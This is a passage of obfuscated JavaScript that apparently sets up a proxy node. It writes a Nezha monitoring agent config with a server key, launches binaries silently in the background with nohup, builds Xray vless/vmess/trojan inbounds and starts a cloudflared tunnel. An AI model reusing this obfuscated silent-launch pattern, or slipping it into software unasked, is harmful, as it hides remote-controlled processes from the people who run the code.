Set([_0x37a2f3['kFupp'],_0x37a2f3[_0x301e5c(-0x2bc,-0x170,-0x260,-0x159)],'2096',_0x37a2f3['diQqr'],_0xf1b49b(0x315,0x313,0x32b,0x3c9),_0x37a2f3[_0x301e5c(-0xd4,0xff,-0x1c,-0x114)]]),_0x33803d=_0x37adc1['has'](_0x1f7cc0)?_0xf1b49b(0x30a,0x3f3,0x4c0,0x3e1):_0x37a2f3['RVCDv'],_0x226919=_0x301e5c(-0x186,-0x10c,-0x85,-0xf9)+_0xf1b49b(0x2fb,0x4ae,0x287,0x36e)+NEZHA_KEY+('\x0adebug:\x20fa'+_0x301e5c(0x157,0x11c,-0x10,0x50)+_0x301e5c(-0x2c4,-0x36b,-0x29d,-0x29c)+_0xf1b49b(0x581,0x556,0x36d,0x4dc)+_0x301e5c(-0x80,-0xcb,-0x81,-0x38)+_0xf1b49b(0x3fc,0x3fc,0x4c8,0x364)+_0xf1b49b(0x3ba,0x3d3,0x374,0x4c8)+_0x301e5c(-0xd3,-0x1e8,-0x1b7,-0x286)+_0xf1b49b(0x3d3,0x240,0x341,0x374)+'e:\x20true\x0adi'+'sable_nat:'+_0x301e5c(-0x18b,-0x10c,-0x138,-0x197)+_0xf1b49b(0x618,0x487,0x5ac,0x558)+_0xf1b49b(0x62b,0x677,0x545,0x51a)+_0xf1b49b(0x40a,0x3c0,0x4c8,0x4f8)+_0xf1b49b(0x3f4,0x570,0x509,0x51e)+_0x301e5c(-0x14d,-0x16,-0x108,-0x100)+_0x301e5c(-0x227,-0x10d,-0x17b,-0x18d)+_0x301e5c(-0x154,0x1,-0xde,-0x61)+_0xf1b49b(0x63d,0x555,0x593,0x552)+_0x301e5c(-0xc7,-0x188,-0x11c,-0x116)+'4\x0aserver:\x20')+NEZHA_SERVER+(_0x301e5c(-0xc9,0x85,-0x5,-0x87)+'ection_cou'+_0x301e5c(-0x12a,-0x1c0,-0xc3,-0x173)+_0xf1b49b(0x40d,0x3b3,0x292,0x324)+_0xf1b49b(0x4d1,0x55a,0x329,0x45c)+_0x301e5c(-0x213,-0x13,-0xbe,-0x22d)+_0xf1b49b(0x4c6,0x4d7,0x49e,0x4b6)+_0x301e5c(0xad,0x91,-0x37,-0x117))+_0x33803d+(_0x301e5c(-0x1c2,-0x312,-0x230,-0x34a)+_0x301e5c(0x28,-0x130,-0x106,-0x15)+_0x301e5c(-0x147,-0x191,-0x16d,-0x278)+_0xf1b49b(0x3c8,0x45f,0x460,0x3ce)+_0x301e5c(-0x1e6,0x94,-0xc7,-0x57)+_0xf1b49b(0x316,0x39f,0x4d9,0x3d4)+'id:\x20')+UUID;fs[_0xf1b49b(0x592,0x403,0x408,0x452)+_0xf1b49b(0x291,0x3be,0x2b5,0x384)](path[_0x301e5c(0x5e,-0x174,-0x7b,0x16)](FILE_PATH,_0x37a2f3['Cygyo']),_0x226919);const _0x3b2071='nohup\x20'+phpPath+'\x20-c\x20\x22'+FILE_PATH+(_0x301e5c(-0x66,-0x252,-0x122,-0x174)+'ml\x22\x20>/dev/'+_0x301e5c(0x7c,-0xf1,-0x69,-0xd5)+'&');try{if(_0x37a2f3[_0xf1b49b(0x397,0x2ff,0x2e6,0x451)](_0x301e5c(0x36,-0x1b0,-0xa0,-0x59),_0x37a2f3[_0xf1b49b(0x5e4,0x3cd,0x615,0x53c)]))await exec(_0x3b2071),console[_0x301e5c(-0x131,-0x1fe,-0x228,-0x1a0)](phpName+(_0x301e5c(-0x57,-0x85,-0x1b1,-0x1d1)+'g')),await new Promise(_0x447c4a=>setTimeout(_0x447c4a,0x2334+-0xf*0x181+0x8bd*-0x1));else{const _0x1091c9={};_0x1091c9[_0x301e5c(-0xf7,-0x138,-0xdb,-0x19e)]=_0x37a2f3['YMEad'],_0x1091c9[_0x301e5c(-0x79,-0x1f8,-0x149,-0x28d)]=_0xf1b49b(0x3d2,0x478,0x289,0x3b8),_0x1091c9['loglevel']=_0x37a2f3[_0xf1b49b(0x612,0x433,0x556,0x4c9)];const _0x21b544={};_0x21b544['id']=_0x37ca8c,_0x21b544[_0xf1b49b(0x238,0x2eb,0x216,0x319)]=_0xf1b49b(0x470,0x4fe,0x33b,0x441)+_0xf1b49b(0x3eb,0x3f6,0x379,0x349);const _0x34b474={};_0x34b474['dest']=0xbb9;const _0x834ff1={};_0x834ff1[_0xf1b49b(0x496,0x438,0x5b0,0x470)]=_0x301e5c(-0xf5,-0x107,-0x153,-0x203)+'o',_0x834ff1[_0x301e5c(-0x4c,0x5f,-0xb4,-0x15a)]=0xbba;const _0x32e6d2={};_0x32e6d2[_0xf1b49b(0x36b,0x4bc,0x4fb,0x465)]=_0x1064fd,_0x32e6d2['protocol']=_0x37a2f3[_0xf1b49b(0x3ac,0x1d4,0x205,0x2fc)],_0x32e6d2[_0xf1b49b(0x6bd,0x4c6,0x68c,0x5b4)]={},_0x32e6d2['streamSett'+_0x301e5c(-0x26a,-0x18e,-0x110,-0x204)]={},_0x32e6d2[_0xf1b49b(0x6bd,0x4c6,0x68c,0x5b4)][_0x301e5c(-0x27b,-0x371,-0x281,-0x237)]=[_0x21b544],_0x32e6d2[_0xf1b49b(0x6bd,0x4c6,0x68c,0x5b4)]['decryption']=_0x37a2f3[_0x301e5c(-0x85,-0x145,-0xd8,-0x3f)],_0x32e6d2[_0xf1b49b(0x6bd,0x4c6,0x68c,0x5b4)][_0xf1b49b(0x42a,0x34e,0x330,0x40b)]=[_0x34b474,_0x834ff1,{'path':_0x37a2f3['vcpqE'],'dest':0xbbb},{'path':_0x37a2f3['DyGJt'],'dest':0xbbc}],_0x32e6d2['streamSett'+_0x301e5c(-0x26a,-0x18e,-0x110,-0x204)][_0xf1b49b(0x269,0x28f,0x477,0x3a9)]=_0x37a2f3['AURTy'];const _0x240603={};_0x240603['id']=_0x377479;const _0x33d8f3={};_0x33d8f3[_0x301e5c(-0x4a,-0x275,-0x13c,-0x240)]=0xbb9,_0x33d8f3[_0xf1b49b(0x242,0x25a,0x3f7,0x339)]=_0x37a2f3[_0xf1b49b(0x4c4,0x370,0x2c9,0x3b2)],_0x33d8f3[_0x301e5c(-0x3c9,-0x3fc,-0x2b0,-0x269)]=_0x37a2f3[_0x301e5c(-0x2f9,-0x241,-0x2a5,-0x330)],_0x33d8f3[_0xf1b49b(0x4d1,0x62d,0x56e,0x5b4)]={},_0x33d8f3[_0x301e5c(0x5,-0x165,-0xa2,-0x81)+_0x301e5c(-0x1cf,-0x179,-0x110,-0x6)]={},_0x33d8f3[_0xf1b49b(0x4d1,0x62d,0x56e,0x5b4)]['clients']=[_0x240603],_0x33d8f3[_0xf1b49b(0x4d1,0x62d,0x56e,0x5b4)][_0xf1b49b(0x404,0x343,0x464,0x4ae)]=_0x37a2f3[_0x301e5c(-0x17a,-0x134,-0xd8,-0x165)],_0x33d8f3[_0x301e5c(0x5,-0x165,-0xa2,-0x81)+_0x301e5c(-0x1cf,-0x179,-0x110,-0x6)]['network']=_0x37a2f3[_0xf1b49b(0x303,0x3f8,0x53c,0x3f8)],_0x33d8f3[_0x301e5c(0x5,-0x165,-0xa2,-0x81)+_0x301e5c(-0x1cf,-0x179,-0x110,-0x6)][_0xf1b49b(0x407,0x5d3,0x587,0x4aa)]='none';const _0x318ab7={};_0x318ab7['id']=_0x11d33e,_0x318ab7['level']=0x0;const _0x64222a={};_0x64222a[_0x301e5c(-0x288,-0x336,-0x281,-0x393)]=[_0x318ab7],_0x64222a['decryption']=_0xf1b49b(0x63a,0x576,0x3d7,0x52f);const _0x43d159={};_0x43d159['port']=0xbba,_0x43d159[_0x301e5c(-0xfa,-0x389,-0x268,-0x36c)]=_0x37a2f3[_0xf1b49b(0x418,0x275,0x372,0x3b2)],_0x43d159[_0xf1b49b(0x3ae,0x35c,0x1f3,0x2f1)]=_0x37a2f3[_0x301e5c(-0x3f8,-0x1dd,-0x2a5,-0x2da)],_0x43d159[_0xf1b49b(0x676,0x5c7,0x5a1,0x5b4)]=_0x64222a,_0x43d159[_0x301e5c(-0xd1,0x91,-0xa2,-0x12d)+_0x301e5c(-0x25b,-0x13d,-0x110,-0x1e)]={},_0x43d159[_0x301e5c(-0x190,-0x2d0,-0x208,-0x2c0)]={},_0x43d159[_0x301e5c(-0xd1,0x91,-0xa2,-0x12d)+_0x301e5c(-0x25b,-0x13d,-0x110,-0x1e)]['network']='ws',_0x43d159[_0x301e5c(-0xd1,0x91,-0xa2,-0x12d)+_0x301e5c(-0x25b,-0x13d,-0x110,-0x1e)][_0x301e5c(-0x1b5,-0x5d,-0xf7,0x10)]=_0x37a2f3[_0xf1b49b(0x37f,0x4a3,0x561,0x4c9)],_0x43d159[_0x301e5c(-0xd1,0x91,-0xa2,-0x12d)+_0x301e5c(-0x25b,-0x13d,-0x110,-0x1e)][_0xf1b49b(0x39a,0x3d5,0x302,0x3e9)]={},_0x43d159[_0x301e5c(-0xd1,0x91,-0xa2,-0x12d)+_0x301e5c(-0x25b,-0x13d,-0x110,-0x1e)][_0xf1b49b(0x39a,0x3d5,0x302,0x3e9)][_0x301e5c(-0x66,-0x134,-0x131,-0x4b)]=_0x37a2f3[_0x301e5c(0x41,-0x12c,-0x4a,-0xd0)],_0x43d159[_0x301e5c(-0x190,-0x2d0,-0x208,-0x2c0)][_0x301e5c(-0x317,-0x294,-0x231,-0x20b)]=!![],_0x43d159[_0x301e5c(-0x190,-0x2d0,-0x208,-0x2c0)][_0xf1b49b(0x486,0x46d,0x31d,0x447)+'de']=[_0x301e5c(-0x3d7,-0x16e,-0x289,-0x299),'tls',_0x37a2f3[_0xf1b49b(0x398,0x503,0x307,0x3d7)]],_0x43d159[_0x301e5c(-0x190,-0x2d0,-0x208,-0x2c0)][_0xf1b49b(0x636,0x5e4,0x5b3,0x522)+'ly']=![];const _0x472b32={};_0x472b32['id']=_0x3cc20b,_0x472b32[_0x301e5c(-0x362,-0x1cc,-0x252,-0x216)]=0x0;const _0x4b874c={};_0x4b874c[_0xf1b49b(0x47d,0x203,0x38f,0x320)]=[_0x472b32];const _0x4a8cf1={};_0x4a8cf1[_0xf1b49b(0x31c,0x265,0x4d9,0x370)]=!![],_0x4a8cf1[_0x301e5c(-0x2a7,-0x1d0,-0x15a,-0x216)+'de']=[_0x301e5c(-0x302,-0x283,-0x289,-0x329),_0xf1b49b(0x469,0x52e,0x3e8,0x4f7),_0x301e5c(-0x12d,-0x138,-0x140,-0xfe)],_0x4a8cf1['metadataOn'+'ly']=![];const _0x150aab={};_0x150aab[_0x301e5c(0x18,-0x14c,-0x13c,-0x19b)]=0xbbb,_0x150aab['listen']=_0x37a2f3[_0xf1b49b(0x44a,0x324,0x289,0x3b2)],_0x150aab[_0xf1b49b(0x42b,0x349,0x2ab,0x2f1)]=_0x37a2f3[_0xf1b49b(0x692,0x51b,0x498,0x58f)],_0x150aab[_0xf1b49b(0x66c,0x67e,0x584,0x5b4)]=_0x4b874c,_0x150aab[_0xf1b49b(0x514,0x65a,0x3a2,0x4ff)+_0xf1b49b(0x356,0x540,0x4e1,0x491)]={},_0x150aab[_0xf1b49b(0x3d9,0x494,0x39b,0x399)]=_0x4a8cf1,_0x150aab[_0xf1b49b(0x514,0x65a,0x3a2,0x4ff)+_0xf1b49b(0x356,0x540,0x4e1,0x491)][_0x301e5c(-0x2fd,-0x271,-0x1f8,-0x2b9)]='ws',_0x150aab[_0xf1b49b(0x514,0x65a,0x3a2,0x4ff)+_0xf1b49b(0x356,0x540,0x4e1,0x491)][_0x301e5c(-0xa2,-0x209,-0x1b8,-0x2ca)]={},_0x150aab[_0xf1b49b(0x514,0x65a,0x3a2,0x4ff)+_0xf1b49b(0x356,0x540,0x4e1,0x491)][_0x301e5c(-0xa2,-0x209,-0x1b8,-0x2ca)][_0x301e5c(-0xc7,-0x1cc,-0x131,0x1a)]=_0x37a2f3[_0x301e5c(-0x30b,-0x34d,-0x1e8,-0x12a)];const _0x4712dd={};_0x4712dd['password']=_0x587ebe;const _0x59d61c={};_0x59d61c['clients']=[_0x4712dd];const _0x5b0de6={};_0x5b0de6['path']=_0xf1b49b(0x5dd,0x37e,0x52d,0x478)+'go';const _0x4e896a={};_0x4e896a['enabled']=!![],_0x4e896a[_0x301e5c(-0x79,-0x19b,-0x15a,-0x259)+'de']=[_0x301e5c(-0x120,-0x206,-0x289,-0x3e8),_0xf1b49b(0x472,0x455,0x4c3,0x4f7),_0xf1b49b(0x3fe,0x30d,0x476,0x461)],_0x4e896a[_0x301e5c(-0x33,0xdc,-0x7f,-0x1a)+'ly']=![];const _0x52e9cf={};_0x52e9cf[_0xf1b49b(0x536,0x587,0x469,0x465)]=0xbbc,_0x52e9cf['listen']=_0x37a2f3[_0xf1b49b(0x401,0x2eb,0x263,0x3b2)],_0x52e9cf[_0x301e5c(-0x21f,-0x3f7,-0x2b0,-0x38e)]=_0x37a2f3[_0xf1b49b(0x546,0x6ed,0x4fc,0x5a8)],_0x52e9cf[_0xf1b49b(0x652,0x604,0x5cf,0x5b4)]=_0x59d61c,_0x52e9cf[_0xf1b49b(0x594,0x45e,0x44a,0x4ff)+_0xf1b49b(0x38c,0x4fe,0x501,0x491)]={},_0x52e9cf[_0xf1b49b(0x3d8,0x32d,0x4aa,0x399)]=_0x4e896a,_0x52e9cf[_0xf1b49b(0x594,0x45e,0x44a,0x4ff)+_0xf1b49b(0x38c,0x4fe,0x501,0x491)][_0x301e5c(-0x2f0,-0x151,-0x1f8,-0x158)]='ws',_0x52e9cf[_0xf1b49b(0x594,0x45e,0x44a,0x4ff)+_0xf1b49b(0x38c,0x4fe,0x501,0x491)][_0x301e5c(-0x7c,-0x193,-0xf7,-0x75)]=_0x37a2f3[_0x301e5c(-0x191,-0x18b,-0xd8,0x31)],_0x52e9cf[_0xf1b49b(0x594,0x45e,0x44a,0x4ff)+_0xf1b49b(0x38c,0x4fe,0x501,0x491)][_0xf1b49b(0x341,0x3b2,0x288,0x3e9)]=_0x5b0de6;const _0x5093a8={};_0x5093a8[_0x301e5c(0xa5,-0x100,0xf,0x16a)]=[_0x37a2f3[_0x301e5c(-0x25,-0x7b,-0x62,-0x187)]];const _0x557f5f={};_0x557f5f['protocol']=_0x37a2f3[_0x301e5c(-0x381,-0x288,-0x22b,-0x2fd)],_0x557f5f['tag']=_0x37a2f3[_0x301e5c(-0x1f0,-0x111,-0x12d,-0x1ff)];const _0x4691d5={};_0x4691d5[_0x301e5c(-0x1f1,-0x32e,-0x2b0,-0x417)]=_0x37a2f3['rqQcM'],_0x4691d5[_0xf1b49b(0x3cd,0x4a0,0x61e,0x4cd)]=_0x37a2f3[_0xf1b49b(0x3b4,0x489,0x4eb,0x49d)];const _0xdc00a8={};_0xdc00a8['log']=_0x1091c9,_0xdc00a8[_0x301e5c(-0x12b,-0x247,-0x1e4,-0x26c)]=[_0x32e6d2,_0x33d8f3,_0x43d159,_0x150aab,_0x52e9cf],_0xdc00a8['dns']=_0x5093a8,_0xdc00a8[_0x301e5c(-0x25a,-0x107,-0x1aa,-0x2ad)]=[_0x557f5f,_0x4691d5];const _0x127e16=_0xdc00a8;_0x160d55[_0x301e5c(0x13,-0x23,-0x14f,-0x24f)+_0xf1b49b(0x473,0x25c,0x45d,0x384)](_0x4d0ab5[_0x301e5c(-0x47,0x32,-0x7b,-0x29)](_0x4063e9,_0x37a2f3[_0xf1b49b(0x52e,0x4c7,0x5c0,0x51d)]),_0x3f3cc4[_0xf1b49b(0x600,0x4a2,0x667,0x5c3)](_0x127e16,null,0x1*-0x2e2+-0x3b*0x55+0x167b));}}catch(_0x13cbc3){console['error'](_0xf1b49b(0x617,0x446,0x567,0x4c4)+_0x301e5c(-0x36b,-0x224,-0x22e,-0x1f9)+_0x13cbc3);}}}else{let _0x4dd1bc='';const _0x1bf07a=[_0x37a2f3[_0xf1b49b(0x3e2,0x468,0x4b5,0x4d6)],_0x37a2f3['tFJYr'],_0x37a2f3['Ekqfu'],_0x37a2f3[_0xf1b49b(0x601,0x5b1,0x526,0x4ba)],'2083',_0x301e5c(-0x142,-0x186,-0x1b,-0x104)];_0x1bf07a[_0xf1b49b(0x4f4,0x4bb,0x335,0x46f)](NEZHA_PORT)&&(_0x4dd1bc=_0x37a2f3['ORwRi']);const _0x48dc26='nohup\x20'+npmPath+_0xf1b49b(0x48a,0x5d1,0x44d,0x54b)+NEZHA_SERVER+':'+NEZHA_PORT+'\x20-p\x20'+NEZHA_KEY+'\x20'+_0x4dd1bc+(_0xf1b49b(0x40b,0x37b,0x2de,0x429)+_0x301e5c(-0x1ba,0x52,-0x11a,0x53)+_0x301e5c(-0x3,-0x77,-0x157,-0xde)+_0xf1b49b(0x3c1,0x41f,0x405,0x424)+_0xf1b49b(0x2d3,0x4e9,0x4a7,0x3e6)+_0x301e5c(-0x168,-0x250,-0x194,-0x2c0)+_0x301e5c(0x11,-0x132,-0x11f,-0x163)+_0x301e5c(-0xc5,0x12,-0x155,-0x7c)+'\x20&');try{if(_0x37a2f3['ujRZR'](_0x37a2f3[_0x301e5c(-0x160,-0x250,-0x1d0,-0x13d)],_0x37a2f3[_0x301e5c(-0xbc,-0xf6,-0x1d0,-0x22e)]))await exec(_0x48dc26),console[_0xf1b49b(0x247,0x253,0x3f2,0x379)](npmName+(_0x301e5c(-0x2c0,-0x26a,-0x1b1,-0x257)+'g')),await new Promise(_0x2abd37=>setTimeout(_0x2abd37,-0x1438+0x7a*0x1+-0x3f1*-0x6));else{if(_0x37a2f3[_0xf1b49b(0x562,0x30b,0x430,0x451)](_0x18960a[_0xf1b49b(0x4d8,0x467,0x476,0x3e5)]['status'],-0xfa1+0xa9*0x1d+0x4*-0x7d)){}}}catch(_0x3f22e0){if(_0x37a2f3[_0xf1b49b(0x340,0x40b,0x2dd,0x351)](_0x301e5c(-0x1eb,-0xec,-0x18f,-0x1f1),_0x37a2f3[_0xf1b49b(0x528,0x58f,0x4c5,0x56f)])){if(_0x3c6b16){const _0x3d829f=_0x377595===_0x37a2f3[_0x301e5c(-0x127,-0x164,-0x36,0x3e)]?_0x301e5c(-0x8d,-0x84,-0xbb,-0x20f)+'m64.ssss.n'+_0x301e5c(0x5f,-0x14d,-0x7a,0x22)+'t':_0x37a2f3[_0x301e5c(-0x2c,-0x225,-0x101,-0x1be)],_0x1e4c75={};_0x1e4c75['fileName']=_0x5eba9a,_0x1e4c75[_0x301e5c(-0xf5,-0x37c,-0x227,-0x338)]=_0x3d829f,_0x498f8d['unshift'](_0x1e4c75);}else{const _0x100c47=_0x37a2f3[_0xf1b49b(0x415,0x4b9,0x34e,0x451)](_0x26c54b,_0x37a2f3[_0xf1b49b(0x681,0x489,0x458,0x56b)])?_0x37a2f3['OISgx']:_0x37a2f3[_0x301e5c(0xa,-0x19d,-0xae,-0x1ee)],_0x30679f={};_0x30679f[_0x301e5c(-0x374,-0x32d,-0x278,-0x1c0)]=_0x4d93dd,_0x30679f[_0xf1b49b(0x3ee,0x416,0x4bf,0x37a)]=_0x100c47,_0xd60b5a[_0x301e5c(-0x53,0x53,-0x45,-0xcf)](_0x30679f);}}else console[_0x301e5c(0x1c,0x10,-0x149,-0x287)](_0xf1b49b(0x307,0x3e9,0x37f,0x436)+_0x301e5c(-0x394,-0x137,-0x22e,-0x215)+_0x3f22e0);}}}else console[_0x301e5c(-0x1ec,-0x167,-0x228,-0x1df)](_0x301e5c(-0x9,-0x174,-0xe8,-0x1a5)+_0xf1b49b(0x43b,0x461,0x4fb,0x48b)+_0x301e5c(-0x354,-0x158,-0x216,-0xdc)+_0xf1b49b(0x63a,0x64f,0x67b,0x5ca));const _0x13ae66=_0xf1b49b(0x545,0x5b7,0x5f8,0x569)+webPath+_0xf1b49b(0x3ca,0x1b6,0x2df,0x2f3)+FILE_PATH+(_0x301e5c(-0x23f,-0x1e5,-0x23e,-0x267)+'on\x20>/dev/n'+_0xf1b49b(0x47a,0x5ef,0x647,0x519));try{if(_0x37a2f3[_0x301e5c(0x79,0x8a,-0x9e,0xbc)]===_0x37a2f3[_0x301e5c(-0x146,-0x133,-0x6f,-0x106)])return _0x43f3f4[_0x301e5c(-0x312,-0x76,-0x1c7,-0x2e3)]()[_0x301e5c(-0x11,-0x5f,-0x2d,-0x98)](nZcaqx[_0xf1b49b(0x2e8,0x2e8,0x3b3,0x354)])[_0xf1b49b(0x365,0x468,0x350,0x3da)]()[_0xf1b49b(0x4b6,0x40f,0x3af,0x508)+'r'](_0x5c61b0)[_0xf1b49b(0x454,0x4c0,0x530,0x574)](nZcaqx['HjQuY']);else await _0x37a2f3[_0xf1b49b(0x1db,0x351,0x407,0x303)](exec,_0x13ae66),console[_0xf1b49b(0x40b,0x253,0x4e7,0x379)](webName+(_0xf1b49b(0x54d,0x4cb,0x474,0x3f0)+'g')),await new Promise(_0x2fa8e6=>setTimeout(_0x2fa8e6,-0xc9b*-0x2+-0x103e+-0x510));}catch(_0x16d284){if(_0x37a2f3[_0xf1b49b(0x45c,0x465,0x4f1,0x39b)]('sMAcc',_0x301e5c(-0x7d,-0x174,-0x133,-0x24))){const _0x5111aa={};_0x5111aa[_0xf1b49b(0x5ff,0x4bc,0x59d,0x4f2)]=_0x37a2f3[_0xf1b49b(0x540,0x4f9,0x626,0x4f9)];const _0x228c6d=_0x5111aa,_0x46560c={};_0x46560c['v']='2',_0x46560c['ps']=''+_0x43ecdb,_0x46560c['add']=_0x529641,_0x46560c[_0x301e5c(-0x25a,-0x34,-0x13c,-0x19e)]=_0x5e0660,_0x46560c['id']=_0xaed3c8,_0x46560c[_0xf1b49b(0x57a,0x35d,0x4df,0x4a8)]='0',_0x46560c['scy']=_0x37a2f3[_0x301e5c(-0xdf,0x94,-0xd8,-0x108)],_0x46560c['net']='ws',_0x46560c[_0x301e5c(-0x1f5,-0x25a,-0x280,-0x342)]=_0x37a2f3['ZbfHC'],_0x46560c[_0xf1b49b(0x5a6,0x53d,0x4ec,0x4e7)]=_0x2abb7a,_0x46560c['path']=_0x37a2f3[_0x301e5c(-0x40f,-0x230,-0x2a3,-0x1f1)],_0x46560c['tls']=_0x37a2f3['hWGSD'],_0x46560c[_0x301e5c(-0x207,-0x17,-0x9f,0x37)]=_0x57e715,_0x46560c[_0xf1b49b(0x4e4,0x3cf,0x505,0x420)]='',_0x46560c['fp']=_0x37a2f3[_0xf1b49b(0x42c,0x3f7,0x46c,0x42a)];const _0x14a31f=_0x46560c,_0x37b2ed='\x0avless://'+_0x118df9+'@'+_0x5e4e4a+':'+_0x223651+(_0xf1b49b(0x563,0x402,0x3ba,0x4c5)+'n=none&sec'+'urity=tls&'+'sni=')+_0x3df764+('&fp=firefo'+'x&type=ws&'+_0xf1b49b(0x311,0x3a7,0x388,0x35a))+_0xfe94a8+(_0x301e5c(-0x1af,-0x237,-0x173,-0x195)+_0x301e5c(-0x116,-0x12,0x12,0xa3)+'3Fed%3D256'+'0#')+_0xe4fc7a+('\x0a\x20\x20\x0avmess:'+'//')+_0x53cbe2[_0x301e5c(-0x33d,-0x302,-0x2ab,-0x39d)](_0x348b62[_0x301e5c(-0x12,0x46,0x22,-0x115)](_0x14a31f))[_0x301e5c(-0x28e,-0xd7,-0x1c7,-0x16b)](_0x37a2f3[_0x301e5c(-0x1f4,-0x22c,-0x24c,-0x2fa)])+('\x0a\x20\x20\x0atrojan'+_0x301e5c(-0x6f,0xe4,-0xf,-0xb8))+_0x32b974+'@'+_0x2d1159+':'+_0x22d95e+('?security='+'tls&sni=')+_0x54e12e+(_0x301e5c(-0x2df,-0x2ea,-0x19e,-0x1b5)+_0xf1b49b(0x5eb,0x588,0x5a3,0x587)+_0x301e5c(-0x188,-0x139,-0x247,-0x12c))+_0x370b0e+('&path=%2Ft'+'rojan-argo'+_0xf1b49b(0x3f8,0x45a,0x443,0x490)+_0xf1b49b(0x42a,0x4f5,0x431,0x50a))+_0x28fb29+_0x301e5c(-0x184,-0x183,-0x22f,-0x387);_0x4eb5b4[_0xf1b49b(0x326,0x286,0x3bf,0x379)](_0x1c47c5[_0x301e5c(-0x32f,-0x322,-0x2ab,-0x2a3)](_0x37b2ed)['toString'](_0x301e5c(0xe1,-0xd8,0x27,-0x8c))),_0x23fd5d['writeFileS'+'ync'](_0x3c5e04,_0x4bc08a['from'](_0x37b2ed)[_0xf1b49b(0x53d,0x42f,0x499,0x3da)](_0x301e5c(0x91,0x186,0x27,0xbe))),_0x5e0dfd[_0x301e5c(-0x30a,-0x2db,-0x228,-0x251)](_0x119472+(_0x301e5c(-0x31c,-0x1a1,-0x222,-0x270)+'aved\x20succe'+_0x301e5c(-0x4a,-0xff,-0x24,0x13c))),_0x3280da(),_0x5b9cc0[_0xf1b49b(0x308,0x21e,0x293,0x31b)]('/'+_0x14a945,(_0x352955,_0x2a6546)=>{function _0x9f0069(_0x175fec,_0x55e16f,_0x1ce5d4,_0x566217){return _0xf1b49b(_0x1ce5d4,_0x55e16f-0x24,_0x1ce5d4-0xf9,_0x175fec- -0x71);}function _0x54f250(_0x4883ff,_0x12c6db,_0x38338f,_0x272d27){return _0xf1b49b(_0x4883ff,_0x12c6db-0xd9,_0x38338f-0x35,_0x272d27- -0x2ed);}const _0x41056a=_0x9ca9c9[_0x9f0069(0x285,0x24e,0x25b,0x2db)](_0x37b2ed)[_0x54f250(0xdc,-0x1f,0x9d,0xed)](_0x9f0069(0x557,0x5b8,0x580,0x66c));_0x2a6546[_0x9f0069(0x545,0x497,0x4f7,0x47d)](_0x54f250(0x38a,0x158,0x14f,0x258)+'pe',_0x228c6d['SZcXl']),_0x2a6546[_0x54f250(-0x9e,0x1ba,0xe3,0x98)](_0x41056a);}),_0x37a2f3[_0xf1b49b(0x371,0x314,0x491,0x3fb)](_0x5ed92e,_0x37b2ed);}else console[_0x301e5c(-0x299,-0x10f,-0x149,-0x26b)](_0x301e5c(-0x10b,-0x202,-0x205,-0x21e)+_0xf1b49b(0x44c,0x3cc,0x32c,0x373)+_0x16d284);}if(fs[_0xf1b49b(0x636,0x510,0x591,0x51f)](botPath)){if(_0x37a2f3['EtIyl']===_0x37a2f3[_0xf1b49b(0x348,0x386,0x589,0x489)]){let _0x5ab42d;if(ARGO_AUTH['match'](/^[A-Z0-9a-z=]{120,250}$/))_0x37a2f3['ujRZR'](_0x37a2f3['NjMvD'],_0x37a2f3[_0xf1b49b(0x5bb,0x6ad,0x65c,0x561)])?_0x22d370[_0xf1b49b(0x3bd,0x359,0x578,0x458)](_0x37a2f3['zOSZy'],_0x2beaaf):_0x5ab42d=_0xf1b49b(0x42a,0x408,0x394,0x3af)+'dge-ip-ver'+'sion\x20auto\x20'+_0x301e5c(-0x200,-0x10c,-0xca,-0x176)+_0xf1b49b(0x6b3,0x46b,0x69c,0x5a1)+'otocol\x20htt'+_0x301e5c(-0x131,-0x72,-0x6e,-0x14d)+_0xf1b49b(0x42d,0x53d,0x5ed,0x4b7)+ARGO_AUTH;else ARGO_AUTH[_0xf1b49b(0x508,0x3f4,0x568,0x4ac)](/TunnelSecret/)?_0x5ab42d=_0x301e5c(-0xc4,-0x25e,-0x1f2,-0x359)+_0x301e5c(-0x6a,-0x33,-0x98,-0x61)+'sion\x20auto\x20'+_0x301e5c(-0x28a,-0x337,-0x20b,-0x2b8)+FILE_PATH+('/tunnel.ym'+_0xf1b49b(0x4f7,0x394,0x52f,0x43a)):_0x5ab42d='tunnel\x20--e'+_0xf1b49b(0x50f,0x529,0x47f,0x509)+_0x301e5c(-0x61,0x66,-0x6d,-0x2f)+_0x301e5c(-0x1a6,-0xe6,-0xca,-0x1fd)+_0x301e5c(0xa5,0x3d,0x0,-0xf7)+_0xf1b49b(0x369,0x50d,0x5b0,0x46b)+'p2\x20--logfi'+_0xf1b49b(0x309,0x3f0,0x4ec,0x3c4)+FILE_PATH+('/boot.log\x20'+_0x301e5c(-0xa9,-0x15f,-0x13,0xac)+'\x20info\x20--ur'+'l\x20http://l'+_0xf1b49b(0x4a2,0x49d,0x208,0x368))+ARGO_PORT;try{await _0x37a2f3[_0x301e5c(-0x242,-0x184,-0x1a6,-0x2b8)](exec,_0xf1b49b(0x634,0x61f,0x518,0x569)+botPath+'\x20'+_0x5ab42d+('\x20>/dev/nul'+_0x301e5c(-0x1a9,-0x1b7,-0x1b9,-0x23d))),console['log'](botName+(_0x301e5c(-0xf1,-0x44,-0x1b1,-0x65)+'g')),await new Promise(_0x58adbe=>setTimeout(_0x58adbe,-0x247c+0x3d*0xe+0x28f6));}catch(_0x4785ad){console[_0xf1b49b(0x52a,0x4b8,0x465,0x458)](_0x301e5c(-0x4b,-0xba,-0x13f,-0x12f)+'uting\x20comm'+_0xf1b49b(0x344,0x4fb,0x511,0x45f)+_0x4785ad);}}else return _0x5c55d9[_0xf1b49b(0x3d9,0x246,0x40b,0x379)](_0x37a2f3['FiaKs']),_0x46bf73;}await new Promise(_0x459df0=>setTimeout(_0x459df0,-0x9e7+0x1*0x67f+0x1*0x16f0));}function getFilesForArchitecture(_0x343f5c){const _0x481542={};_0x481542[_0x14926d(0x525,0x5bc,0x5cd,0x6ae)]=function(_0x4b4bc9,_0x7449c4){return _0x4b4bc9||_0x7449c4;};function _0x14926d(_0x1ce768,_0x4dc783,_0x141f00,_0x282345){return 